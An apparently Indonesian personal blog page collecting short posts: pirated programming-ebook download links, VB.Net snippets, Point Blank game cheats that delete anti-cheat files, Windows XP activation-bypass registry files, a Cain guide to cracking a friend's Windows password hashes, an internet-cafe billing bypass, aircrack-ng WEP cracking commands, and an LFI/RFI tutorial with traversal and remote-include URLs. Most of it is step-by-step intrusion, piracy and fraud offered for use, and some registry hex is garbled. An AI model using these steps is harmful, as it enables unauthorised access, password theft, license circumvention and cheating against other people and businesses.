Belajar PHP,SQL,HTML,JS,AJAX..

By ricky x sometime | At 10.53 | Label : | 0 Comments


lansung cek TKP ja kk....
klu da yg laen tambahin ya kk...

Quote:http://rapidshare.com/files/167948457/Te...inutes.zip

http://rapidshare.com/files/167970463/PH...ummies.zip

http://rapidshare.com/files/168012622/Be...g_PHP4.zip

http://rapidshare.com/files/167929531/OR...tshell.zip

http://rapidshare.com/files/167930093/OR...n_2004.zip

http://rapidshare.com/files/168018762/Th...Basics.zip

http://rapidshare.com/files/167971822/PH...v_2006.zip

http://rapidshare.com/files/167986905/Te...in_One.zip

http://rapidshare.com/files/167928902/Ap...3rd_Ed.rar

http://rapidshare.com/files/167948761/Si...te_Using_P
HP_MySQL.zip

http://rapidshare.com/files/167966253/OR..._MySQL.zip

http://rapidshare.com/files/167978293/Co...d_MySQL.zi
p

http://rapidshare.com/files/167980114/Le..._MySQL.zip

http://rapidshare.com/files/167992447/PH..._Bible.zip

http://rapidshare.com/files/167998184/Pr...Absolute_B
eginner.zip

http://rapidshare.com/files/168046714/McGraw-
Hill.Osborne.How.to.Do.Everything.with.PHP.and.My SQL.Feb.2005.rar

http://rapidshare.com/files/167928939/PH...greSQL.zip

http://rapidshare.com/files/168009264/Ap...vice_to_Pr
ofessional.rar

http://rapidshare.com/files/167965512/OR...2nd_Ed.zip

http://rapidshare.com/files/167921213/Ap...Profession
al.zip

http://rapidshare.com/files/167924139/Fo...opment.rar

http://rapidshare.com/files/167924336/Bu...amweaver_M
X.zip

http://rapidshare.com/files/167924700/Ex...P_2006.zip

http://rapidshare.com/files/167924771/Ma...ibrary.zip

http://rapidshare.com/files/167925159/Ne...nd_PHP.zip

http://rapidshare.com/files/167925340/OR...curity.zip

http://rapidshare.com/files/167948239/OR..._PHP_5.zip

http://rapidshare.com/files/168135927/Sp..._PHP_5.zip

http://rapidshare.com/files/167951254/Ap...proach.zip

http://rapidshare.com/files/167953400/Ap...th_PHP.zip

http://rapidshare.com/files/167960181/Ap...curity.rar

http://rapidshare.com/files/167960349/PH...2nd_ed.zip

http://rapidshare.com/files/167961246/Pr...ionals.zip

http://rapidshare.com/files/167963811/OR...2nd_Ed.zip

http://rapidshare.com/files/167964593/Pr...3rd_Ed.zip

http://rapidshare.com/files/167968298/Sa...sebook.zip

http://rapidshare.com/files/167973237/Pa...lications.
zip

http://rapidshare.com/files/167974740/Pr...2nd_Ed.zip

http://rapidshare.com/files/167976451/PH...Websites.z
ip

http://rapidshare.com/files/167985123/Ne...h_PHP4.zip

http://rapidshare.com/files/168005490/PH...amming.zip

http://rapidshare.com/files/168022331/Pr...2nd_Ed.zip

http://rapidshare.com/files/168026306/PH..._Guide.zip

http://rapidshare.com/files/168030603/Wi...cal_Applic
ations.rar

http://rapidshare.com/files/168042356/Wr...amming.zip

http://rapidshare.com/files/167930655/Ap...al_PHP.zip

http://rapidshare.com/files/168056935/Ap...l_PHP4.zip

http://rapidshare.com/files/168051779/Pr..._PHP_4.zip

http://rapidshare.com/files/168061516/Dr...opment.zip

Quote:http://hotfile.com/dl/6901985/98de9c8/Ap...6.pdf.html

http://hotfile.com/dl/7025867/e732031/Cr...S.pdf.html

http://hotfile.com/dl/7028794/f0d1885/CS..._.pdf.html

http://hotfile.com/dl/7067854/9d15c92/Fo...6.pdf.html

http://hotfile.com/dl/7216927/c1dd86e/HT..._.pdf.html

http://hotfile.com/dl/7285509/11f2454/PHP6.rar.html

http://hotfile.com/dl/7334951/79df63a/PH...).pdf.html

http://hotfile.com/dl/7499259/1a81419/Se...s.pdf.html

http://hotfile.com/dl/7528908/316ba99/Ho...l.pdf.html

http://hotfile.com/dl/7581959/88b0fd2/Mc...U.pdf.html

http://hotfile.com/dl/7621568/a6b40f0/St..._.chm.html

http://hotfile.com/dl/7787496/9983de2/Ja..._.chm.html
semoga berguna teman..peace..

Cara Membuat Nomor Otomatis Dengan Format Tanggal [VB.Net]

By ricky x sometime | At 10.51 | Label : | 0 Comments
jadi coding ini buat nampilin nomor otomatis dengan format tanggal/bulan/tahunn+nomor urut..

gimana codingnya di vb.net ??

neh..

------------------------------------------------------------------
Shared Function NomorBaru() As String
Dim intValue As Integer = 1
Dim Nota As String = Date.Now.ToString("ddMMyy")
Dim rValue As String
Using objConnection As New OleDb.OleDbConnection("Provider=Microsoft.Jet.OLEDB.4.0;" & "Data Source=" & Application.StartupPath + "\Master.mdb ; " & "User Id=admin;")
objConnection.Open()
Dim objCommand As OleDb.OleDbCommand = objConnection.CreateCommand()
objCommand.CommandText = String.Format("SELECT NoService FROM [SO] WHERE NoService LIKE'{0}###' ORDER BY NoService DESC", Nota)
Dim objValue As Object = objCommand.ExecuteScalar()
If objValue IsNot Nothing Then
If objValue IsNot DBNull.Value Then
Dim strvalue As String = objValue.ToString().Remove(0, 6)
Integer.TryParse(strvalue, intValue)
intValue += 1
End If
End If
objCommand.Dispose()
End Using
rValue = Nota & intValue.ToString("00#")
Return rValue
End Function
---------------------------------------------------------------------------

ket :

warna Merah : untuk Database Yg Digunakan
warna Hijau : untuk nama Field yg digunakan
warna kuning : untuk Nama tabel yg digunakan


Terima kasih..

mudah2an berguna dah..

Cara Mengetahui Serial Port yg terhubung dengan Modem

By ricky x sometime | At 10.49 | Label : | 0 Comments


Source : http://blog.terrenjr.com/2010/09/21/meng...gan-modem/

Iseng2 maLem – malem yg dingin gini..

emang enak buat cari coding yg pas..

hohohh..

alhasi,,gara2 iseng gini..pengen tau deh gimana sih cara mengetahui Serial Port Mana yang Terhubung Dengan Modem / Bisa terkoneksi dengan Modem…

gimana sih COdingnya ??

Ada setelah ini…

hehehe..


Pertama..

kita siapin Command Button,RichTextBox,SerialPort dan Combo Box..

terus desain seperti ini..

Kemudian..

ketikan Coding ini ( SUdah ada Penjelasannya ) :


Code:
Public Class Form1

Dim comPorts As Array 'menampung Port ke dalam array
Dim rxBuff As String 'Buffer untuk menerima data

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
'Saat Form load
'Menampilkan PORT ke dalam Combo Box
comPorts = IO.Ports.SerialPort.GetPortNames()

For i = 0 To UBound(comPorts)
ComboBox1.Items.Add(comPorts(i))
Next

'Set ComboBox1 text untuk menampilkan port yg paling pertama
ComboBox1.Text = ComboBox1.Items.Item(0)
SerialPort1.PortName = ComboBox1.Text

'Set Attribut port
SerialPort1.BaudRate = 19200
SerialPort1.Parity = IO.Ports.Parity.None
SerialPort1.StopBits = IO.Ports.StopBits.One
SerialPort1.DataBits = 8

TextBox1.Enabled = False

End Sub

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
'saat button di click..buffer menjadi hilang
rxBuff = ""

'If port tertutup,maka langsung dibuka
If SerialPort1.IsOpen = False Then SerialPort1.Open()

'Tulis data ke dalap Port
SerialPort1.Write(TextBox1.Text & vbCr)

'Pause untuk 800ms
System.Threading.Thread.Sleep(800)

'saat port terbuka,langsung di tutup
If SerialPort1.IsOpen = True Then SerialPort1.Close()

'saat buffer tidak ada data maka end sub
If rxBuff = "" Then GoTo ends

'tampilakn data ke RichTextBOx
RichTextBox1.Text = rxBuff

ends:
End Sub

Private Sub ComboBox1_SelectedIndexChanged(ByVal sender As Object, ByVal e As System.EventArgs) Handles ComboBox1.SelectedIndexChanged

If SerialPort1.IsOpen = False Then
SerialPort1.PortName = ComboBox1.Text
Else : MsgBox("Operation only valid when port is closed.", MsgBoxStyle.Exclamation, "Error")

End If

RichTextBox1.Clear()
End Sub

Private Sub SerialPort1_DataReceived(ByVal sender As Object, ByVal e As System.IO.Ports.SerialDataReceivedEventArgs) Handles SerialPort1.DataReceived

System.Threading.Thread.Sleep(300)

rxBuff = (SerialPort1.ReadExisting)

End Sub

End Class
semoga bisa di pahami ya teman......

Kumpulan cheat exp terbaru oktober 2010

By ricky x sometime | At 05.06 | Label : | 0 Comments

RPE SNUTZ.US UNTUK GB AUTO EXP


Di stel duluhotkeynya gan
caranya
1. klik.... opsi.us
2 key.us
3 pilih key nya diset sesuai yg kamu inginkan
ingat key jgn tabrakan sama tombol cheat
ane saranin pake aja tanda2 koma atau titik aja

main pb /buka rpe yg ini pasti lo dah tau kan gak usah gua ajarin
balik lagi ke pb terus lo beli misi mayor(*biasa lo pasti taukan pake masmed ke atau pake yg lain yg penting bisa untuk beli misi dan complitin tu misi pake hotkey.
setelah selesai.............


tekan tombol alt tab on
lalu buka RPE nya lagi tekan hotkeynya atau lo stop manual juga boleh

liat RPE
liat angka 8. (ada dua angka 8 )
angka 8 yang pertama klik kanan lo send add to send list (paling kanan bawah )
angka 8 yang ke dua klik kanan add to send list

centrang ke dua2nya yang telah agan add to send list lalu ubah yang angka
1 menjadi 100 , yang angka 1000 jadi 10
soked ID nya isi sesuai dengan soked ID (8 yang pertama lo kapi aja) kolom ke d klik continuously lalu start

balek lagi ke PB alahasil klo agan berhasil tu exp akan bertambah sendiri.

NB.harus dengan ketelitian dan kecepatan tangan.
TAMAT.
pass :: snut.us 
buat SPE biar tahan gak bugstrap :

1. buka folder PB hapus BugTrap.dll,HShield,i3BaseDx.dll,i3SceneDx.dll....
2. buka SPE...set key word buat start ma stop....seperti yg di jelasin TS....
3. PB launcher ceck dulu buat updatee file yg tadi kita hapus...
4. buka altab apa aja yg masih work..
5. start PB login seperti biasa..pas masuk PB di lobby langsung altab..injeck PBnya ma SPE...masu PB lagi...altab off.....
6. nah agan mo kliling2 ampe 2 jam juga gak bakal DC ato buggtrapp..
7. tinggal kalo mo GBin bikin room aja..tekan key start ama stop jadi gakperlu altab lagi buat start ma stop...
8 jadinya kita altab tinggal sekali doang buat send...OK
9 mudah2an bisa ngebantu.....

yg mo GB HS cari exp...
bomb misi 3 rounde...3 orang...2 korban 1 GB..... roude 1 yg korban 1 yg ga pake rpe bunuh diri...yg GBan HS yg pake rPE...round 2 stop rPE..langsung altab...kirim 26 ma 45...1630:10 aja.......HS ampe gak HS lagi trus korban yg satu lagi bunuh diri...round ketiga sama round kedua...liat exp 29k point 23-27k


yg mo GB cari HS+point..
maen destroy....2 org aja...korban ma GBan.....round 1 GBan hancurin aja dulu generator ampe menang...rounde 2 HS...stop langsung altab..send 26 ma 45... 7350:5 aja...hs ampe habis sambil GBan nembakin generator....round 3 GBan tembakin generator lagi ampe menang....liat hasil akhir...HS 7300 bo' ma point 29k....

New Heroin 31.10.2010

 F5 : HackPangkat/Point (buat beli misi mayor)
F6 : Hack Card Mission Complete 1-10
F7 : Reset Card Mission
F9 : Hack Title (buat ambil senjata bertitle)+++ Slot Title jadi 3 yang kebuka
"syarat harus ada 1 title apa aja (kalo bisa baru)"
1. Klik card pertama tekan F6 terus tutup (liat apa bertambah tuh exp+card selesai)
2. buka lagi klik card pertama lagi terus F7 tutup lagi (liat cardnya jadi g selesai) terus begitu sampe bosen.....

"cukup klik card pertama" pastikan medal bertambah...
link
pass
Credit :TXB-Hero™ & DeXBlu

Cara Buat Firefox lebih cepat 300%

By ricky x sometime | At 22.20 | Label : | 0 Comments
ini udah ta coba n hasilx muanttappp!!!

Step 1: Open Firefox and type about:config in the address bar where you normally type a web address.

Step 2: Then click the button: "I'll be careful, I promise".

Step 3: In the filter bar below the address bar type network.http.

Step 4: Double-click on "network.http.pipelining" to change the setting from false to true.

Step 5: Double-click on "network.http.proxy.pipelining" to change the value from false to true.

Step 6: Double-click on "network.http.pipelining.maxrequests" and change the number to "30". This means it will make 30 requests at once.

(Normally the browser will make one request to a web page at a time. When you enable pipelining it will make several at once, which really speeds up page loading.)

Step 7: Several lines above network.http.proxy.pipelining you�ll see

"network.http.max-persistant-connections-per-proxy" and
"network.http.max-persistant-connections-per-server".

Double-click each line and change the value to "8".

Step 8: Two lines up locate and double-click on "network.http.max-connections" and set the value to "48".

Step 9: Now right-click (control-click on a Mac) anywhere in the configuration (the area where you�ve been making the changes). Select "New" then "Integer".

Step 10: When prompted, copy and paste or type the following into the field provided:

nglayout.initialpaint.delay

Step 11: When prompted to add a value, enter the number "0". This value is the amount of time the browser waits before it acts on information it recieves.

Step 12: Close all windows and tabs. The changes will take effect when you restart Firefox.


These changes allow Firefox to make multiple server connections and will speed up page downloads for better, more efficient use of your broadband connection. If you're using a broadband connection you'll load pages much faster now!
coba aja klo gk percaya...

Tips Windows Crack

By ricky x sometime | At 04.20 | Label : | 0 Comments
Sory klo uda pada tau
cuman sekedar berbagi aja....


langkah pertama buka notepad, lalu tuliskan ini :

Windows Registry Editor Version 5.00


[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWPAEvents]

"OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33,93,fd

"LastWPAEventLogged"=hex:d5,07,05,00,06,00,07,00,0f,00,38,00,24,00, fd,02


[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion]

"CurrentBuild"="1.511.1 () (Obsolete data - do not use)"

"InstallDate"=dword:427cdd95

"ProductId"="69831-640-1780577-45389"

"DigitalProductId"=hex:a4,00,00,00,03,00,00,00,36,39,38,33,31,2d,36 ,34,30,2d,

31,37,38,30,35,37,37,2d,34,35,33,38,39,00,5a,00,00,00,41,32,32,2d,30,30,30,

30,31,00,00,00,00,00,00,00,00,0d,04,89,b2,15,1b,c4,toilet,62,4f,e6,64,6f,01,00,

00,00,00,00,27,ed,85,43,a2,20,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,

00,00,00,00,00,00,00,00,00,00,00,31,34,35,30,34,00,00,00,00,00,00,00,ce,0e,

00,00,12,42,15,a0,00,08,00,00,87,01,00,00,00,00,00,00,00,00,00,00,00,00,00,

00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,94,a2,b3,ac

"LicenseInfo"=hex:9e,bf,09,d0,3a,76,a5,27,bb,f2,da,88,58,ce,58,e9,05,6b ,0b,82,

c3,74,ab,42,0d,fb,toilet,c3,ea,57,d0,9d,67,a5,3d,6e,42,0d,60,c0,1a,70,24,46,16,

0a,0a,ce,0d,b8,27,4a,46,53,f3,17


terus langkah selanjutnya, klik save as, isi dengan nama apa saja, tetapi harus berekstensi .reg

selanjutnya file yang bertipe .reg tersebut tinggal anda double klik, dan lihat apa yang terjadi setelah 2 detik kemudian, eng ing eng, windows anda sudah genuine.


logika crack diatas adalah pada

"ProductId"="69831-640-1780577-45389"


"DigitalProductId"=hex:a4,00,00,00,03,00,00,00,36,39,38,33,31,2d,36,34, 30,2d,


31,37,38,30,35,37,37,2d,34,35,33,38,39,00,5a,00,00,00,41,32,32,2d,30,30,30,


30,31,00,00,00,00,00,00,00,00,0d,04,89,b2,15,1b,c4,toilet,62,4f,e6,64,6f,01,00,


00,00,00,00,27,ed,85,43,a2,20,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,


00,00,00,00,00,00,00,00,00,00,00,31,34,35,30,34,00,00,00,00,00,00,00,ce,0e,


00,00,12,42,15,a0,00,08,00,00,87,01,00,00,00,00,00,00,00,00,00,00,00,00,00,


00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,94,a2,b3,ac


coba anda buka http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html

di web itu terdapat converter bilangan hexa, jika sewaktu-waktu anda terkena segel genuine lagi oleh mikocok, anda tinggal ganti saja serial number yang ada di "ProductId"="69831-640-1780577-45389" dengan serial number yang lain, contohnya "ProductId"="H689T-BFM2F-R6GF8-9WPYM-B6378" dan jangan lupa untuk mengganti "DigitalProductId" dengan cara menconvert sn yang ada pada ProductId dengan hexa converter. cara mendapatkan SN xp dengan program keyfinder.

Cara mengetahui password komputer dengan cain

By ricky x sometime | At 04.14 | Label : | 0 Comments
cara cracking password komputer pake cain
ini khusus windows.
intro:
suatu hari surjono bermain ke rumah tomo..sesampainya di rumah surjono melihat komputer tomo
"tomo..bolehkah diri ku menggunakan komputer diri mu" tanya surjono "oh tentu saja diri mu boleh menggunakan komputer diri ku..silahkan di pakai,anggap saja seperti komputer bukan punya mu" kata tomo dengan ramah
"owh..makasih ..password ya apa tom??" kata surjono yang memang komputer tomo di pasang password dan tentu saja harus memasukan passsword ketika login..
tapi tomo tidak mengatakan password nya melainkan datang kedepan komputer dan langsung mengetik password dengan ligat cepat dan tepat..
dan akhirnya komputernya bisa di pakai oleh surjono.lalu tomo pun pergi " surjono aku pergi dulu ya,,mau mendodos sawit(memanen buah sawit)" kata tomo
dan setelah beberapa lama surjono pun penasaran dengan password yang di gunakan oleh tomo.dan surjono melihat CAIN ada di komputernya jono
-------------------------
oke intro udah..berarti permasalahnya si surjono ingin mengetahui password tomo menggunakan program cain

langsung aja...

kelebihan cain dalam hal ini
1. cain mudah dan simple
kekurangan
1.kita harus menginstal cain jika cain tidak ada di komputer korban
2.lumayan lambat jika pake brute force
3.keberhasilan tergantung pada wordlist jika menggunakan dictionary attack

langsung
1.buka cain
2.pilih CRACKER

3.pilih LM & NTLM Hashes ( di pinggir program cain)

4.klik kanan pada menu LM & NTLM Hashes

5.pilih ADD TO LIST..nah keluar pilihan ada..centang yang IMPORT hashes from local system Artinya kita mengadd username dan hash yang ada di komputer( kalo ga salah)

6.klik NEXT

7.nah keluar tuh semua password yang masih dalam bentuk hash(bener ga ni??)

8.klik kanan pada username yang mau kita crack password ya

9.keluar pilihan..pilih dictionary attack kemudian pilih NTLM hashes..mengapa?karna type ya NTLM,coba di cek di lajur TYPE

10.nah keluar tuh..kita lakukan setingan..selain As lS(password) di ilangin centangnya..jadi cuma AS lS(password) yang di centang

11.pilih ADD untuk menambah daftar text...pokoknya masukin aja dah semua kumpulan password kita..semakin banyak..semakin besar keberuntungan kita..kalo ga punya gunakan bawaan cain..letaknya di c:\program files\cain\wordlists\wordlists.txt

12.klik STARt untuk memulai penyerangan

13.kalo password komputer terdapat di wordlist kemungkinan kita akan berhasil mendapatkan password nya jika tidak berhasil berarti kita harus memperbanyak wordlist

selain cara dictionary attack masih banyak cara lain..ex brute force..silahkan di explore n di inget2 lagi di memory.

cain manteb banget dah..silahkah di uprek uprek,ntar kalo dapat sesuatu silahkan di share
kalo ada kejanggalan tolong di koreksi..

Cara jadikan XP Anda 100% Genuine

By ricky x sometime | At 04.13 | Label : | 0 Comments
bagi yang pengen jadikan Windows XP nya 100% Gennuine . . . !!!

berikut ini adalah tricknya


langsung aja Yachh. . ikuti langkah-langkah di bawah ini, perhatikan script dibawah ini :

Windows Registry Editor Version 5.00

Code:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents]
"OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33,93,fd
"LastWPAEventLogged"=hex:d5,07,05,00,06,00,07,00,0f,00,38,00,24,00,fd,02
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]
"SubVersionNumber"=""
"CurrentBuild"="1.511.1 () (Obsolete data - do not use)"
"InstallDate"=dword:44cd8133
"ProductName"="Microsoft Windows XP"
"RegDone"=""
"RegisteredOrganization"="Icon Computer"
"RegisteredOwner"="Icon Computer"
"ProductId"="55274-083-1816955-22307"
"DigitalProductId"=hex:a4,00,00,00,03,00,00,00,35,35,32,37,34,2d,36,34,30,2d,\
38,33,36,35,33,39,31,2d,32,33,32,30,31,00,2e,00,00,00,41,32,32,2d,30,30,30,\
30,31,00,00,00,00,00,00,00,76,c7,64,cc,82,46,03,68,eb,53,4a,11,a5,85,03,00,\
00,00,00,00,b3,27,d3,44,1f,3c,3b,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,38,30,35,32,35,00,00,00,00,00,00,00,89,18,\
00,00,5c,10,78,54,7f,01,00,00,fc,1a,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,3a,db,c2,b8
"LicenseInfo"=hex:33,8f,a0,1f,f1,70,1e,70,76,91,0c,85,8d,d8,72,e6,22,81,8b,ae,\
5c,a3,55,fb,a2,d3,ba,60,f6,d0,4e,4a,37,85,5d,00,86,39,5b,db,dd,fc,35,91,3c,\
ca,d4,43,81,22,ca,82,5a,f6,47,08


Eyts,,,, jangan senang dulu, masih ada yang harus anda lakukan seperti yang dibawah ini.

1. Buka notepad di komputer anda (ketik run → notepad)

2. Copy script yang diatas tadi kemudian pastekan di notepad.

3. Kemudian ganti tulisan yang icon computer dengan nama apa saja yang anda inginkan seperti yang muncul system properties pada layar monitor anda.

4. Setelah itu, kemudian klik [File] > [Save As] dan beri nama dengan CurrentVersion.reg.

5. Lalu, Merge file tersebut dengan klik 2x atau klik kanan filenya kemudian pilih → merge.

6. Dan akan muncul berupa pop-up yang menyatakan bahwa apakah anda bersedia memasukkan file yang anda buat tadi untuk dimasukkan kedalam registry, dan pilih yes.

7. kemudian restart komputer anda.

Setelah langkah-langkah diatas sudah anda lakukan, sekarang tinggal melakukan validasi atau pengecekan apakah windows anda asli atau tidak, caranya :

Untuk melakukan cek tersebut anda membutuhkan suatu software yang bernama WGAPluginInstall, dapat di download disini. kemudian anda install software tersebut seperti biasa.


Selamat Mencoba...

Dan untuk mengetahui apakah windows sobat udah menjadi "aspal" asli tapi palsu tanpa menggunkan aplikasi apapun/lewat bantuan koneksi internet, sobat bisa mengecek lewat link test validasi di bawah ini.
http://www.microsoft.com/genuine/validate/.goodluck..

Trik Cracking Caesarsoft Billing

By ricky x sometime | At 04.04 | Label : | 0 Comments
  cuma ingin berbagi tips n trik cara membobol billing warnet khususnya CAESARSOFT*

Sebenernya caranya cukup simple. kita log in id n pass username menggunakan administrator. tapi perlu digaris bawah klo cara ini “masih” ada kemungkinan ketauan. Kalo OPnya teliti coz waktu kita udah log in pake pass admin. Di billing Client ga kelacak alias ga ada user yg maket itu komp…jadi waspadalah !! ^^

Okelah tanpa panjang pendek. gini caranya :
1. Pastiin kita telah masuk login screennya Cyber Billing
2. Tekan key : Windows + U, trus kita masuk Utility Manager
3. Pilih menu Help
4.Klo sdh masuk help pagenya, Klik kanan di windows bar
5. Pilih Jump to URL..
6. Ketik ke C: buat masuk ke systemnya… trus modif aja sesuai keinginan (bisa jg lgsg masuk buat internetan gratis. Tapi cm pake IE aja..)

Cracking WEP dengan menggunakan Backtrack 3 Final

By ricky x sometime | At 04.02 | Label : | 0 Comments
Ok....
Seperti biasa,,,Siapkan alat perang dulu...

1. 1. Pertama kamu harus punya laptop pastinya..(kalo bisa yang atheros punya)
2. 2. Kedua, kamu harus menginstal Backtrack..(terserah mw backtrack brp)
3. 3. Harus berada di tempat yang terdapat jaringan dengan menggunakan enkripsi WEP.



Selanjutnya....
Hal pertama yang harus kamu lakukan adalah...

[list=1]
[*] Buka console
[*] Ketikkan perintah 'airmon-ng' (tanpa tanda ')
seperti pada gambar berikut :

[Image: wep1.jpg]

[*] Kemudian ketikkan command 'airmon-ng stop ath0' (tanpa tanda ')
seperti pada gambar berikut :

[Image: wep2.jpg]

[*] Masih di console yang sama ketikkan command 'airmon-ng start wifi0' (tanpa tanda ')
seperti pada gambar berikut :

[Image: wep3.jpg]

[*] Kemudian ketik lagi command 'airodump-ng ath0' (tanpa tanda ')
seperti pada gambar berikut :

[Image: wep4.jpg]

[*] lalu buka console baru lalu ketikkan command 'airodump-ng --channel 6 --bssid 00:21:27:E8:AF:16 -w hasil ath0' (tanpa tanda ')
seperti pada gambar berikut :

[Image: wep5.jpg]

[*] Kita gunakan arp replay agar packet yang didapatkan menjadi lebih besar dengan buka console baru lalu ketikkan command 'aireplay-ng --arpreplay -b 00:21:27:E8:AF:16 - h 00:0E:35:7E:62:86 ath0' (tanpa tanda ')
seperti pada gambar berikut :

[Image: wep6.jpg]

[*] Lalu apabila ivs nya udah banyak..yah kira-kira 25000,,anda boleh melakukan proses cracking..buka console baru..kemudian ketikkan command 'aircrack-ng hasil*.cap' (tanpa tanda ')
seperti pada gambar berikut :

[Image: wep7.jpg]
[Image: wep8.jpg]

[*] Lalu kemudian bakalan muncul pilihan index number of target network...lalu kita ketikkan angka dimana target akan kita crack wep ny.
seperti pada gambar berikut ini :

[Image: wep9.jpg]

Nah...pada proses cracking ini membutuhkan sedikit waktu..yah g sampe 1 menit kok....
seperti pada gambar berikut :


.
mohon pencerahannya dr para senior..

Mengenal LFI dan RFI

By ricky x sometime | At 03.38 | Label : | 0 Comments
Buat yg belum tau aja yaach dan yang pengen tau... klo yg udh master, mending ga ush di baca... drpd buang2 waktu....

Sebelumnya apa sih LFI dan RFI itu??

LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.
RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server.


Penjelasan
fungsi-fungsi yang dapat menyebabkan LFI/RFI:

Code:
include();
include_once();
require();
require_once();

Dengan syarat pada konfigurasi php di server:
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off

contoh:
misalkan kita punya file index.php dengan content kodenya seperti ini,


Code:


misal $imagefile=image.php
mungkin di url akan terlihat seperti ini bentuknya

Code:
http://www.[target].com/index.php?imagefile=image.php
maka script ini akan menampilkan halaman image.php.


nah disini attacker akan dapat melakukan LFI karena variable imagefile di include begitu saja tanpa menggunakan filter.
misalnya attacker ingin mengakses file passwd yang ada pada server, maka dia akan mencoba memasukan seperti ini ../../../../../../../../../etc/passwd << dengan jumlah "../" itu tergantung dari kedalaman folder tempat file index.php tersebut.. dengan begitu isi file passwd akan ditampilkan di browser. kita bisa menggunakan metode menebak struktur folder dalam website target :lol: tapi seandainya terdapat error seperti di bawah ini: Warning: main(../../../../../../../../../etc/passwd.php) [function.main]: failed to open stream: No such file or directory in /their/web/root/index.php on line 2 liat pada passwd ternyata dia ditambah dengan extensi ".php" berarti code yang digunakan untuk include adalah seperti ini Code: Code:

nah untuk dapat mengelabui script tersebut kita bisa menggunakan (dengan syarat magic_quotes_gpc = off) jadi dibelakang /etc/passwd kita tambahkan seperti

http://www.[target].com/index.php?imagefile=../../../../../../../../../etc/passwd

lalu untuk apa ? yaitu untuk menghilangkan karakter apapun setelah passwd.
* ini disebut null injection.

Nah kita sudah menemukan bug LFI pada website target, sekarang kita coba cari bug RFI dengan menambahkan link file remote (dari luar website) pada variable imagefile. misalnya:

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

dengan file evil.txt misal berisi "hacked by n4is3n"

jika ternyata di browser menampilkan kalimat tersebut berarti website tersebut vulner terhadap bug RFI juga.


Pencegahan
Nah sekarang saatnya untuk pencegahan kedua bug tersebut, yaitu
1. Memvalidasi variable.
2. Mengkonfigurasi kembali settingan php pada server website Anda.
allow_url_include = off
allow_url_fopen = off
magic_quotes_gpc = on
3. pada include mungkin bisa ditambahkan "./"
jadinya seperti ini,

Code:
Code:
include("./"$_GET[imagefile].".php");

maksudnya dengan seperti itu, saat kita mengakses file dari luar server maka hasilnya akan error karena saat pemrosesan setiap file yang masuk ke variable page akan ditambah ./ di depannya.

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

dengan seperti ini server atau website yang diinject akan mencari file http://www.[remote].com/evil.txt dan pastinya akan menyebabkan server menampilkan error bahwa tidak ditemukannya file tsb.

Semoga tutor sederhana dan sangat awam ini (Maklum, yg nulis jg msh awam) bermanfaat.dan untuk para master mohon koreksinya bila ada yang salah.

*Referensi:
- Crawler
- http://en.wikipedia.org/local_file_incusion
- http://en.wikipedia.org/remote_file_inclusion
- Percobaan sendiri
good luck...!

ISTILAH-ISTILAH HACKING

By ricky x sometime | At 03.32 | Label : | 0 Comments
RFI (Remote File Inclusion)
-> bla.. bla.. bla..

LFI (Local File Inclusion)
-> .......

SQLi (SQL Injection)
-> ....

RCE (Remote Command Execution)
->.....

DDOS (Distributed Denial of Service)
->....
Bug
-> Kesalahan pada pemrograman yang menyebabkan sistem dapat dieksploitasi atau error dengan kondisi tertentu. Dalam web hacking, terdapat beberapa bug seperti RFI, LFI, SQLi, RCE, XSS, dll.

Patch
-> Perbaikan terhadap bug dengan mengupdate sistem yg vurnerable.

Vurnerable
-> Sistem yang memiliki bug sehingga rentan terhadap serangan.
RFI (Remote File Inclusion)
-> penyisipan sebuah file dari luar ke dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load

LFI (Local File Inclusion)
-> suatu bug dimana kita bisa menginclude kan file (file yang berada didalam server yg bersangkutan)
ke page yang vulnerable (vulnerable LFI maksudnya).

SQL Injection
-> salah satu jenis penyerangan yang mengijinkan user tidak sah(penyerang)untuk mengakses database server.

DDOS
-> membuat suatu sistem crash & karena overload sehingga tidak bisa diakses atau mematikan service.
SQL Injection : memasukkan (injeksi) command2 sql ke dalm query sql dlm prgram, memanipulasi query sql dlm program.

DDoS : Distributed Denial of Service. DoS sndiri adalah serangan dgn melakukan request terus menerus pd victim dg tujuan untk mghabiskan resource pd victim,spt bandwith,memory,dll. Victim yg kehabisan resource, akan down. *"Distributed" DoS adalah DoS yg d lakukan secara terdistribusi atau berjamaah dlm jumlah besar,biasanya menggunakan bot pd irc.

Shell: inti dari sistem operasi.Shell mengendalikan krj sistem operasi nya.

Shell intepreter: bentuk antarmuka yg merupakan penghubung antara shell dgn brainware. Bentuk umumnya berupa console,cmd,webshell,dll.

Deface: merubah tampilan hlman suatu website secara illegal

Debug: kegiatan mencari bug pada aplikasi dan memperbaiki bug yg d temukan.

XSS
-> adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client

Phising
-> adalah tindakan memperoleh informasi pribadi seperti User ID, password, PIN, nomor rekening bank, nomor kartu kredit Anda secara ilegal.

Keylogger
